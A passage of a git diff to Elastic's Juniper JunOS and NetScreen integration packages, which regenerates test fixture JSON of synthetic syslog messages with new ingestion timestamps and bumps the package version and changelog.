BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-11-22T13:01:58.803581945Z" + "ingested": "2021-12-14T14:48:05.090714765Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-11-22T13:01:58.803584298Z" + "ingested": "2021-12-14T14:48:05.090715159Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-11-22T13:01:58.803586650Z" + "ingested": "2021-12-14T14:48:05.090715556Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-11-22T13:01:58.803589125Z" + "ingested": "2021-12-14T14:48:05.090716077Z" }, "ecs": { "version": "1.12.0" 
@@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-11-22T13:01:58.803591489Z" + "ingested": "2021-12-14T14:48:05.090716491Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-11-22T13:01:58.803593856Z" + "ingested": "2021-12-14T14:48:05.090716877Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-11-22T13:01:58.803596248Z" + "ingested": "2021-12-14T14:48:05.090717268Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-11-22T13:01:58.803598606Z" + "ingested": "2021-12-14T14:48:05.090717660Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-11-22T13:01:58.803600938Z" + "ingested": "2021-12-14T14:48:05.090718047Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-11-22T13:01:58.803603292Z" + "ingested": "2021-12-14T14:48:05.090718439Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-11-22T13:01:58.803605750Z" + "ingested": "2021-12-14T14:48:05.090718947Z" }, "ecs": { "version": "1.12.0" 
@@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-11-22T13:01:58.803608075Z" + "ingested": "2021-12-14T14:48:05.090719340Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-11-22T13:01:58.803610506Z" + "ingested": "2021-12-14T14:48:05.090719726Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - "ingested": "2021-11-22T13:01:58.803612935Z" + "ingested": "2021-12-14T14:48:05.090720110Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", "event": { - "ingested": "2021-11-22T13:01:58.803615330Z" + "ingested": "2021-12-14T14:48:05.090720500Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "Mar 4 11:21:59 orum oinBCSed3073.www.lan: ilm.exe[3193]: SNMPD_TRAP_QUEUE_MAX_ATTEMPTS: : fugiatqu: after 4003 attempts, deleting 4568 traps queued to exercita", "event": { - "ingested": "2021-11-22T13:01:58.803617707Z" + "ingested": "2021-12-14T14:48:05.090720886Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "Mar 18 18:24:33 TFTPD_BIND_ERR: restart [1431]: ntut: bind: failure", "event": { - "ingested": "2021-11-22T13:01:58.803620161Z" + "ingested": "2021-12-14T14:48:05.090721286Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "Apr 2 01:27:07 lite ugia517.api.host: doei.exe[7073]: RPD_LDP_SESSIONDOWN: : LDP session 10.88.126.165 is down, failure", "event": { - "ingested": "2021-11-22T13:01:58.803622548Z" + "ingested": "2021-12-14T14:48:05.090721673Z" }, "ecs": { "version": "1.12.0" 
@@ -375,7 +375,7 @@ { "message": "Apr 16 08:29:41 fpc6 SNMPD_CONTEXT_ERROR: [180]: eturadip: ent: unknown in 5848 context 316", "event": { - "ingested": "2021-11-22T13:01:58.803624951Z" + "ingested": "2021-12-14T14:48:05.090722060Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "Apr 30 15:32:16 NASD_CHAP_INVALID_CHAP_IDENTIFIER message repeated [796]: iumdo: lo2721: received aturv expected CHAP ID: ectetura", "event": { - "ingested": "2021-11-22T13:01:58.803627334Z" + "ingested": "2021-12-14T14:48:05.090722468Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "May 14 22:34:50 UI_LOAD_EVENT message repeated [6342]: seq: User 'moll' is performing a 'allow'", "event": { - "ingested": "2021-11-22T13:01:58.803629660Z" + "ingested": "2021-12-14T14:48:05.090722853Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "May 29 05:37:24 fdeFin.exe[4053]: SNMP_TRAP_TRACE_ROUTE_TEST_FAILED : traceRouteCtlOwnerIndex = 1450, traceRouteCtlTestName = edic", "event": { - "ingested": "2021-11-22T13:01:58.803632089Z" + "ingested": "2021-12-14T14:48:05.090723358Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "Jun 12 12:39:58 SNMPD_RTSLIB_ASYNC_EVENT: restart [508]: uae: oremip: sequence mismatch failure", "event": { - "ingested": "2021-11-22T13:01:58.803634545Z" + "ingested": "2021-12-14T14:48:05.090723747Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "Jun 26 19:42:33 tesse olupta2743.internal.localdomain: ine.exe[3181]: BOOTPD_TIMEOUT: : Timeout success unreasonable", "event": { - "ingested": "2021-11-22T13:01:58.803663516Z" + "ingested": "2021-12-14T14:48:05.090724135Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "Jul 11 02:45:07 NASD_RADIUS_MESSAGE_UNEXPECTED message repeated [33]: abore: Unknown response from RADIUS server: unknown", "event": { - "ingested": "2021-11-22T13:01:58.803670115Z" + "ingested": "2021-12-14T14:48:05.090724517Z" }, "ecs": { "version": "1.12.0" 
@@ -459,7 +459,7 @@ { "message": "Jul 25 09:47:41 PWC_LOCKFILE_BAD_FORMAT: restart [3426]: illum: PID lock file has bad format: eprehe", "event": { - "ingested": "2021-11-22T13:01:58.803672574Z" + "ingested": "2021-12-14T14:48:05.090724919Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "Aug 8 16:50:15 snostr.exe[1613]: RPD_KRT_AFUNSUPRT : tec: received itaspe message with unsupported address family 4176", "event": { - "ingested": "2021-11-22T13:01:58.803674965Z" + "ingested": "2021-12-14T14:48:05.090725314Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "Aug 22 23:52:50 oreeufug.exe[6086]: PWC_PROCESS_FORCED_HOLD : Process plicaboN forcing hold down of child 619 until signal", "event": { - "ingested": "2021-11-22T13:01:58.803677295Z" + "ingested": "2021-12-14T14:48:05.090725702Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "Sep 6 06:55:24 MIB2D_IFL_IFINDEX_FAILURE message repeated [4115]: tiu: SNMP index assigned to wri changed from 3902 to unknown", "event": { - "ingested": "2021-11-22T13:01:58.803679630Z" + "ingested": "2021-12-14T14:48:05.090726084Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "Sep 20 13:57:58 mwr cia5990.api.localdomain: pitlabo.exe[3498]: UI_DBASE_MISMATCH_MAJOR: : Database header major version number mismatch for file 'ende': expecting 6053, got 4884", "event": { - "ingested": "2021-11-22T13:01:58.803682075Z" + "ingested": "2021-12-14T14:48:05.090726479Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "Oct 4 21:00:32 iuntN utfugi851.www5.invalid: nul.exe[1005]: SNMPD_VIEW_INSTALL_DEFAULT: : eetdo: success installing default 1243 view 5146", "event": { - "ingested": "2021-11-22T13:01:58.803684512Z" + "ingested": "2021-12-14T14:48:05.090726868Z" }, "ecs": { "version": "1.12.0" 
@@ -531,7 +531,7 @@ { "message": "Oct 19 04:03:07 DCD_PARSE_STATE_EMERGENCY message repeated [2498]: uptatem: An unhandled state was encountered during interface parsing", "event": { - "ingested": "2021-11-22T13:01:58.803686873Z" + "ingested": "2021-12-14T14:48:05.090727262Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "Nov 2 11:05:41 loremagn acons3820.internal.home: ain.exe[7192]: LOGIN_PAM_MAX_RETRIES: : Too many retries while authenticating user iquipex", "event": { - "ingested": "2021-11-22T13:01:58.803689288Z" + "ingested": "2021-12-14T14:48:05.090727653Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "Nov 16 18:08:15 onorume.exe[3290]: BOOTPD_NO_BOOTSTRING : No boot string found for type veleu", "event": { - "ingested": "2021-11-22T13:01:58.803691670Z" + "ingested": "2021-12-14T14:48:05.090728058Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "Dec 1 01:10:49 eirured sequamn5243.mail.home: sshd: sshd: SSHD_LOGIN_FAILED: Login failed for user 'ciatisun' from host '10.252.209.246'.", "event": { - "ingested": "2021-11-22T13:01:58.803694055Z" + "ingested": "2021-12-14T14:48:05.090728444Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "Dec 15 08:13:24 COS: restart : Received FC-\u003eQ map, caecat", "event": { - "ingested": "2021-11-22T13:01:58.803696417Z" + "ingested": "2021-12-14T14:48:05.090728830Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "Dec 29 15:15:58 cgatool message repeated : nvolupta: generated address is success", "event": { - "ingested": "2021-11-22T13:01:58.803698766Z" + "ingested": "2021-12-14T14:48:05.090729235Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "Jan 12 22:18:32 CHASSISD_SNMP_TRAP6 message repeated [4667]: idolor: SNMP trap generated: success (les)", "event": { - "ingested": "2021-11-22T13:01:58.803701484Z" + "ingested": "2021-12-14T14:48:05.090729734Z" }, "ecs": { "version": "1.12.0" 
@@ -615,7 +615,7 @@ { "message": "Jan 27 05:21:06 ssb FLOW_REASSEMBLE_SUCCEED: : Packet merged source 10.102.228.136 destination 10.151.136.250 ipid upt succeed", "event": { - "ingested": "2021-11-22T13:01:58.803703995Z" + "ingested": "2021-12-14T14:48:05.090730131Z" }, "ecs": { "version": "1.12.0" @@ -627,7 +627,7 @@ { "message": "Feb 10 12:23:41 DFWD_PARSE_FILTER_EMERGENCY message repeated [2037]: serrorsi: tsedquia encountered errors while parsing filter index file", "event": { - "ingested": "2021-11-22T13:01:58.803706338Z" + "ingested": "2021-12-14T14:48:05.090730525Z" }, "ecs": { "version": "1.12.0" @@ -639,7 +639,7 @@ { "message": "Feb 24 19:26:15 remips laboreet5949.mail.test: tesse.exe[4358]: RPD_LDP_SESSIONDOWN: : LDP session 10.148.255.126 is down, unknown", "event": { - "ingested": "2021-11-22T13:01:58.803708740Z" + "ingested": "2021-12-14T14:48:05.090730910Z" }, "ecs": { "version": "1.12.0" @@ -651,7 +651,7 @@ { "message": "Mar 11 02:28:49 fpc2 NASD_CHAP_REPLAY_ATTACK_DETECTED: [mipsumqu]: turad: eth680.6195: received doloremi unknown.iciatis", "event": { - "ingested": "2021-11-22T13:01:58.803711152Z" + "ingested": "2021-12-14T14:48:05.090731296Z" }, "ecs": { "version": "1.12.0" @@ -663,7 +663,7 @@ { "message": "Mar 25 09:31:24 rema mcol7795.domain: mquis lsys_ssam_handler: : processing lsys root-logical-system tur", "event": { - "ingested": "2021-11-22T13:01:58.803713591Z" + "ingested": "2021-12-14T14:48:05.090731682Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "Apr 8 16:33:58 UI_LOST_CONN message repeated [7847]: loreeuf: Lost connection to daemon orainci", "event": { - "ingested": "2021-11-22T13:01:58.803715975Z" + "ingested": "2021-12-14T14:48:05.090732074Z" }, "ecs": { "version": "1.12.0" 
@@ -687,7 +687,7 @@ { "message": "Apr 22 23:36:32 PWC_PROCESS_HOLD: restart [1791]: itse: Process lapari holding down child 2702 until signal", "event": { - "ingested": "2021-11-22T13:01:58.803718329Z" + "ingested": "2021-12-14T14:48:05.090732462Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "May 7 06:39:06 undeo ficiade4365.mail.domain: norum.exe[4443]: LIBSERVICED_SOCKET_BIND: : dantium: unable to bind socket ors: failure", "event": { - "ingested": "2021-11-22T13:01:58.803720663Z" + "ingested": "2021-12-14T14:48:05.090732852Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "May 21 13:41:41 liq eleumiu2852.lan: mfugiat.exe[3946]: LOGIN_FAILED: : Login failed for user olu from host mSect5899.domain", "event": { - "ingested": "2021-11-22T13:01:58.803723075Z" + "ingested": "2021-12-14T14:48:05.090733238Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "Jun 4 20:44:15 idolo.exe[6535]: MIB2D_IFL_IFINDEX_FAILURE: : SNMP index assigned to deseru changed from 6460 to unknown", "event": { - "ingested": "2021-11-22T13:01:58.803725481Z" + "ingested": "2021-12-14T14:48:05.090733644Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "Jun 19 03:46:49 modtempo.exe[5276]: CHASSISD_RELEASE_MASTERSHIP: : Release mastership notification", "event": { - "ingested": "2021-11-22T13:01:58.803730944Z" + "ingested": "2021-12-14T14:48:05.090734032Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "Jul 3 10:49:23 fpc4 PWC_PROCESS_HOLD: [3450]: dexea: Process aturExc holding down child 7343 until signal", "event": { - "ingested": "2021-11-22T13:01:58.803733636Z" + "ingested": "2021-12-14T14:48:05.090734436Z" }, "ecs": { "version": "1.12.0" 
@@ -759,7 +759,7 @@ { "message": "Jul 17 17:51:58 ame.exe[226]: SERVICED_RTSOCK_SEQUENCE : boreet: routing socket sequence error, unknown", "event": { - "ingested": "2021-11-22T13:01:58.803736114Z" + "ingested": "2021-12-14T14:48:05.090734842Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "Aug 1 00:54:32 consect6919.mail.localdomain iset.exe[940]: idpinfo: urere", "event": { - "ingested": "2021-11-22T13:01:58.803738518Z" + "ingested": "2021-12-14T14:48:05.090735234Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "Aug 15 07:57:06 RPD_KRT_NOIFD: restart [4822]: oreeufug: No device 5020 for interface lo4593", "event": { - "ingested": "2021-11-22T13:01:58.803745412Z" + "ingested": "2021-12-14T14:48:05.090735624Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "Aug 29 14:59:40 eprehen oinB3432.api.invalid: citatio.exe[5029]: craftd: , unknown", "event": { - "ingested": "2021-11-22T13:01:58.803748122Z" + "ingested": "2021-12-14T14:48:05.090736027Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "Sep 12 22:02:15 ACCT_CU_RTSLIB_error message repeated [7583]: eetd: liquide getting class usage statistics for interface enp0s2674: success", "event": { - "ingested": "2021-11-22T13:01:58.803750614Z" + "ingested": "2021-12-14T14:48:05.090736423Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "Sep 27 05:04:49 userro oree nimadmi7341.www.home RT_FLOW - kmd [", "event": { - "ingested": "2021-11-22T13:01:58.803753078Z" + "ingested": "2021-12-14T14:48:05.090736831Z" }, "ecs": { "version": "1.12.0" @@ -831,7 +831,7 @@ { "message": "Oct 11 12:07:23 LOGIN_PAM_NONLOCAL_USER: restart [686]: rauto: User rese authenticated but has no local login ID", "event": { - "ingested": "2021-11-22T13:01:58.803755500Z" + "ingested": "2021-12-14T14:48:05.090737252Z" }, "ecs": { "version": "1.12.0" 
@@ -843,7 +843,7 @@ { "message": "Oct 25 19:09:57 doconse.exe[6184]: RPD_KRT_NOIFD : No device 5991 for interface enp0s7694", "event": { - "ingested": "2021-11-22T13:01:58.803757987Z" + "ingested": "2021-12-14T14:48:05.090737645Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "Nov 9 02:12:32 quidolor1064.www.domain: uspinfo: : flow_print_session_summary_output received rcita", "event": { - "ingested": "2021-11-22T13:01:58.803760380Z" + "ingested": "2021-12-14T14:48:05.090738030Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "Nov 23 09:15:06 RPD_TASK_REINIT: restart [1810]: mfugi: Reinitializing", "event": { - "ingested": "2021-11-22T13:01:58.803762778Z" + "ingested": "2021-12-14T14:48:05.090738420Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "Dec 7 16:17:40 inibusBo.exe[2509]: ECCD_TRACE_FILE_OPEN_FAILED : allow: failure", "event": { - "ingested": "2021-11-22T13:01:58.803765227Z" + "ingested": "2021-12-14T14:48:05.090738874Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "Dec 21 23:20:14 ECCD_TRACE_FILE_OPEN_FAILED message repeated [2815]: rudexer: accept: unknown", "event": { - "ingested": "2021-11-22T13:01:58.803767845Z" + "ingested": "2021-12-14T14:48:05.090739382Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "Jan 5 06:22:49 eseosqu oeius641.api.home: laud.exe[913]: LOGIN_FAILED: : Login failed for user turQ from host tod6376.mail.host", "event": { - "ingested": "2021-11-22T13:01:58.803770281Z" + "ingested": "2021-12-14T14:48:05.090739772Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "Jan 19 13:25:23 ine.exe[1578]: FSAD_CONNTIMEDOUT : Connection timed out to the client (oreve2538.www.localdomain, 10.44.24.103) having request type reprehen", "event": { - "ingested": "2021-11-22T13:01:58.803772668Z" + "ingested": "2021-12-14T14:48:05.090740157Z" }, "ecs": { "version": "1.12.0" 
@@ -927,7 +927,7 @@ { "message": "Feb 2 20:27:57 UI_SCHEMA_SEQUENCE_ERROR: restart [734]: rinre: Schema sequence number mismatch", "event": { - "ingested": "2021-11-22T13:01:58.803775113Z" + "ingested": "2021-12-14T14:48:05.090740550Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "Feb 17 03:30:32 LIBJNX_EXEC_PIPE: restart [946]: olors: Unable to create pipes for command 'deny': unknown", "event": { - "ingested": "2021-11-22T13:01:58.803777597Z" + "ingested": "2021-12-14T14:48:05.090740943Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "Mar 3 10:33:06 UI_DBASE_MISMATCH_EXTENT: restart [4686]: isnost: Database header extent mismatch for file 'lumdolor': expecting 559, got 7339", "event": { - "ingested": "2021-11-22T13:01:58.803780003Z" + "ingested": "2021-12-14T14:48:05.090741325Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "Mar 17 17:35:40 NASD_usage message repeated [7744]: eumfu: unknown: quidex", "event": { - "ingested": "2021-11-22T13:01:58.803782371Z" + "ingested": "2021-12-14T14:48:05.090741719Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "Apr 1 00:38:14 /kmd: ", "event": { - "ingested": "2021-11-22T13:01:58.803784765Z" + "ingested": "2021-12-14T14:48:05.090742130Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "Apr 15 07:40:49 sshd message repeated : very-high: can't get client address: unknown", "event": { - "ingested": "2021-11-22T13:01:58.803787131Z" + "ingested": "2021-12-14T14:48:05.090742518Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "Apr 29 14:43:23 fpc4 RPD_LDP_NBRUP: [4279]: stlaboru: LDP neighbor 10.248.68.242 (eth1282) is success", "event": { - "ingested": "2021-11-22T13:01:58.803789513Z" + "ingested": "2021-12-14T14:48:05.090742911Z" }, "ecs": { "version": "1.12.0" 
@@ -1011,7 +1011,7 @@ { "message": "May 13 21:45:57 uun iduntutl4723.example: uel.exe[5770]: SNMPD_TRAP_QUEUE_DRAINED: : metco: traps queued to vel sent successfully", "event": { - "ingested": "2021-11-22T13:01:58.803791927Z" + "ingested": "2021-12-14T14:48:05.090743304Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "May 28 04:48:31 fpc8 ECCD_PCI_WRITE_FAILED: [4837]: radip: cancel: success", "event": { - "ingested": "2021-11-22T13:01:58.803794363Z" + "ingested": "2021-12-14T14:48:05.090743697Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "Jun 11 11:51:06 TFTPD_RECVCOMPLETE_INFO message repeated [7501]: piciatis: Received 3501 blocks of 5877 size for file 'tatisetq'", "event": { - "ingested": "2021-11-22T13:01:58.803796757Z" + "ingested": "2021-12-14T14:48:05.090744077Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "Jun 25 18:53:40 usp_trace_ipc_reconnect message repeated illum.exe:USP trace client cannot reconnect to server", "event": { - "ingested": "2021-11-22T13:01:58.803799130Z" + "ingested": "2021-12-14T14:48:05.090744473Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "Jul 10 01:56:14 amnis atevelit2799.internal.host: tatiset.exe IFP trace\u003e BCHIP: : cannot write ucode mask reg", "event": { - "ingested": "2021-11-22T13:01:58.803801492Z" + "ingested": "2021-12-14T14:48:05.090744884Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "Jul 24 08:58:48 RPD_MPLS_LSP_DOWN message repeated [5094]: moditemp: MPLS LSP eth2042 unknown", "event": { - "ingested": "2021-11-22T13:01:58.803803850Z" + "ingested": "2021-12-14T14:48:05.090745276Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "Aug 7 16:01:23 CHASSISD_PARSE_INIT: restart [4153]: uatDuisa: Parsing configuration file 'usB'", "event": { - "ingested": "2021-11-22T13:01:58.803806258Z" + "ingested": "2021-12-14T14:48:05.090745668Z" }, "ecs": { "version": "1.12.0" 
@@ -1095,7 +1095,7 @@ { "message": "Aug 21 23:03:57 RMOPD_ROUTING_INSTANCE_NO_INFO: restart [6922]: upidatat: No information for routing instance non: failure", "event": { - "ingested": "2021-11-22T13:01:58.803808647Z" + "ingested": "2021-12-14T14:48:05.090746050Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "Sep 5 06:06:31 Utenimad.exe[4305]: CHASSISD_TERM_SIGNAL: : Received SIGTERM request, success", "event": { - "ingested": "2021-11-22T13:01:58.803811Z" + "ingested": "2021-12-14T14:48:05.090746439Z" }, "ecs": { "version": "1.12.0" @@ -1119,7 +1119,7 @@ { "message": "Sep 19 13:09:05 tseddo.exe[484]: RPD_OSPF_NBRUP : OSPF neighbor 10.49.190.163 (lo50) aUteni due to failure", "event": { - "ingested": "2021-11-22T13:01:58.803813391Z" + "ingested": "2021-12-14T14:48:05.090746822Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "Oct 3 20:11:40 cfeb NASD_usage: [6968]: litseddo: failure: metconse", "event": { - "ingested": "2021-11-22T13:01:58.803815800Z" + "ingested": "2021-12-14T14:48:05.090747212Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "Oct 18 03:14:14 RPD_LDP_NBRDOWN message repeated [4598]: emu: LDP neighbor 10.101.99.109 (eth4282) is success", "event": { - "ingested": "2021-11-22T13:01:58.803818195Z" + "ingested": "2021-12-14T14:48:05.090747606Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "Nov 1 10:16:48 RPD_RDISC_NOMULTI message repeated [4764]: con: Ignoring interface 594 on lo7449 -- unknown", "event": { - "ingested": "2021-11-22T13:01:58.803820642Z" + "ingested": "2021-12-14T14:48:05.090747987Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "Nov 15 17:19:22 BOOTPD_NEW_CONF: restart [1768]: isquames: New configuration installed", "event": { - "ingested": "2021-11-22T13:01:58.803823049Z" + "ingested": "2021-12-14T14:48:05.090748377Z" }, "ecs": { "version": "1.12.0" 
@@ -1179,7 +1179,7 @@ { "message": "Nov 30 00:21:57 SNMP_TRAP_LINK_DOWN message repeated [7368]: ngelit: ifIndex 4197, ifAdminStatus ons, ifOperStatus unknown, ifName lo3193", "event": { - "ingested": "2021-11-22T13:01:58.803825428Z" + "ingested": "2021-12-14T14:48:05.090748783Z" }, "ecs": { "version": "1.12.0" @@ -1191,7 +1191,7 @@ { "message": "Dec 14 07:24:31 MIB2D_ATM_ERROR message repeated [4927]: udexerci: voluptat: failure", "event": { - "ingested": "2021-11-22T13:01:58.803827810Z" + "ingested": "2021-12-14T14:48:05.090749186Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper_junos/manifest.yml b/packages/juniper_junos/manifest.yml index 5cf7e166cbc..8eb8674ed76 100644 --- a/packages/juniper_junos/manifest.yml +++ b/packages/juniper_junos/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper_junos title: Juniper JunOS -version: 0.0.1 +version: 0.0.2 description: Collect logs from Juniper JunOS with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/juniper_netscreen/changelog.yml b/packages/juniper_netscreen/changelog.yml index daebd9c0346..2418ca2da64 100644 --- a/packages/juniper_netscreen/changelog.yml +++ b/packages/juniper_netscreen/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.0.1" changes: - description: Initial release of new package split from oroginal Juniper package diff --git a/packages/juniper_netscreen/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper_netscreen/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index d94f27801d8..4b91ffe5e7d 100644 --- a/packages/juniper_netscreen/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json 
+++ b/packages/juniper_netscreen/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "modtempo: NetScreen device_id=olab system-low-00628(rci): audit log queue Event Alarm Log is overwritten (2016-1-29 06:09:59)", "event": { - "ingested": "2021-11-22T13:04:30.321245930Z" + "ingested": "2021-12-14T14:48:09.217500811Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "luptat: NetScreen device_id=isiutal [moenimi]system-low-00620(gnaali): RTSYNC: Timer to purge the DRP backup routes is stopped. (2016-2-12 13:12:33)", "event": { - "ingested": "2021-11-22T13:04:30.321251659Z" + "ingested": "2021-12-14T14:48:09.217503789Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "deomni: NetScreen device_id=tquovol [ntsuntin]system-medium-00062(tatno): Track IP IP address 10.159.227.210 succeeded. (ofdeF)", "event": { - "ingested": "2021-11-22T13:04:30.321254248Z" + "ingested": "2021-12-14T14:48:09.217504301Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "untutlab: NetScreen device_id=tem [ons]system-medium-00004: DNS lookup time has been changed to start at ationu:ali with an interval of nsect", "event": { - "ingested": "2021-11-22T13:04:30.321256648Z" + "ingested": "2021-12-14T14:48:09.217504700Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "eve: NetScreen device_id=tatiset [eprehen]system-medium-00034(piscing): Ethernet driver ran out of rx bd (port 1044)", "event": { - "ingested": "2021-11-22T13:04:30.321259066Z" + "ingested": "2021-12-14T14:48:09.217505089Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "eomnisis: NetScreen device_id=mqui [civeli]system-high-00026: SCS: SCS has been tasuntex for enp0s5377 .", "event": { - "ingested": "2021-11-22T13:04:30.321261458Z" + "ingested": "2021-12-14T14:48:09.217505538Z" }, "ecs": { "version": "1.12.0" 
